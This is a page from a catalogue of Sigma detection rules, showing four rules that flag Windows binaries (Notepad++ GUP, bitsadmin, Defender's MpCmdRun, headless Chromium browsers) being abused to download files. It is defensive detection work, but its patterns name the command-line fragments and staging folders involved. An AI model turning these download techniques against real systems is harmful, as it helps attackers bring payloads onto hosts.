File Download Using Notepad++ GUP Utility
Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
view Sigma YAML
title: File Download Using Notepad++ GUP Utility
id: 44143844-0631-49ab-97a0-96387d6b2d7c
status: test
description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
references:
- https://twitter.com/nas_bench/status/1535322182863179776
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-10
modified: 2023-03-02
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\GUP.exe'
- OriginalFileName: 'gup.exe'
selection_cli:
CommandLine|contains|all:
- ' -unzipTo '
- 'http'
filter:
ParentImage|endswith: '\notepad++.exe'
condition: all of selection* and not filter
falsepositives:
- Other parent processes other than notepad++ using GUP that are not currently identified
level: high
Convert to SIEM query
high
File Download Via Bitsadmin To A Suspicious Target Folder
Detects usage of bitsadmin downloading a file to a suspicious target folder
view Sigma YAML
title: File Download Via Bitsadmin To A Suspicious Target Folder
id: 2ddef153-167b-4e89-86b6-757a9e65dcac
related:
- id: 6e30c82f-a9f8-4aab-b79c-7c12bce6f248
type: obsolete
- id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67
type: similar
status: test
description: Detects usage of bitsadmin downloading a file to a suspicious target folder
references:
- https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
- https://isc.sans.edu/diary/22264
- https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
- https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-28
modified: 2025-12-10
tags:
- attack.persistence
- attack.execution
- attack.stealth
- attack.t1197
- attack.s0190
- attack.t1036.003
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\bitsadmin.exe'
- OriginalFileName: 'bitsadmin.exe'
selection_flags:
CommandLine|contains:
- ' /transfer '
- ' /create '
- ' /addfile '
selection_folder:
CommandLine|contains:
- ':\Perflogs'
- ':\ProgramData\'
- ':\Temp\'
- ':\Users\Public\'
- ':\Windows\'
- '\$Recycle.Bin\'
- '\AppData\Local\'
- '\AppData\Roaming\'
- '\Contacts\'
- '\Desktop\'
- '\Favorites\'
- '\Favourites\'
- '\inetpub\wwwroot\'
- '\Music\'
- '\Pictures\'
- '\Start Menu\Programs\Startup\'
- '\Users\Default\'
- '\Videos\'
- '%ProgramData%'
- '%public%'
- '%temp%'
- '%tmp%'
condition: all of selection_*
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/info.yml
simulation:
- type: atomic-red-team
name: Windows - BITSAdmin BITS Download
technique: T1105
atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
Convert to SIEM query
high
File Download Via Windows Defender MpCmpRun.EXE
Detects the use of Windows Defender MpCmdRun.EXE to download files
view Sigma YAML
title: File Download Via Windows Defender MpCmpRun.EXE
id: 46123129-1024-423e-9fae-43af4a0fa9a5
status: test
description: Detects the use of Windows Defender MpCmdRun.EXE to download files
references:
- https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866
- https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
author: Matthew Matchen
date: 2020-09-04
modified: 2023-11-09
tags:
- attack.stealth
- attack.t1218
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection_img:
- OriginalFileName: 'MpCmdRun.exe'
- Image|endswith: '\MpCmdRun.exe'
- CommandLine|contains: 'MpCmdRun.exe'
- Description: 'Microsoft Malware Protection Command Line Utility'
selection_cli:
CommandLine|contains|all:
- 'DownloadFile'
- 'url'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
File Download with Headless Browser
Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
view Sigma YAML
title: File Download with Headless Browser
id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e
related:
- id: ef9dcfed-690c-4c5d-a9d1-482cd422225c
type: derived
status: test
description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
references:
- https://twitter.com/mrd0x/status/1478234484881436672?s=12
- https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
author: Sreeman, Florian Roth (Nextron Systems)
date: 2022-01-04
modified: 2025-10-07
tags:
- attack.command-and-control
- attack.stealth
- attack.t1105
- attack.t1564.003
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\brave.exe'
- '\chrome.exe'
- '\msedge.exe'
- '\opera.exe'
- '\vivaldi.exe'
CommandLine|contains|all:
- '--headless'
- 'dump-dom'
- 'http'
filter_optional_edge_1:
Image|startswith:
- 'C:\Program Files (x86)\Microsoft\Edge\Application\'
- 'C:\Program Files (x86)\Microsoft\EdgeCore\'
- 'C:\Program Files (x86)\Microsoft\EdgeWebView\'
- 'C:\Program Files\Microsoft\Edge\Application\'
- 'C:\Program Files\Microsoft\EdgeCore\'
- 'C:\Program Files\Microsoft\EdgeWebView\'
- 'C:\Program Files\WindowsApps\Microsoft.MicrosoftEdge'
Image|endswith:
- '\msedge.exe'
- '\msedgewebview2.exe'
- '\MicrosoftEdge.exe'
CommandLine|contains: '--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom'
filter_optional_edge_2:
Image|contains:
- '\AppData\Local\Microsoft\WindowsApps\'
- '\Windows\SystemApps\Microsoft.MicrosoftEdge'
Image|endswith:
- '\msedge.exe'
- '\MicrosoftEdge.exe'
CommandLine|contains: '--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml
Convert to SIEM query
Showing 451-500 of 3,750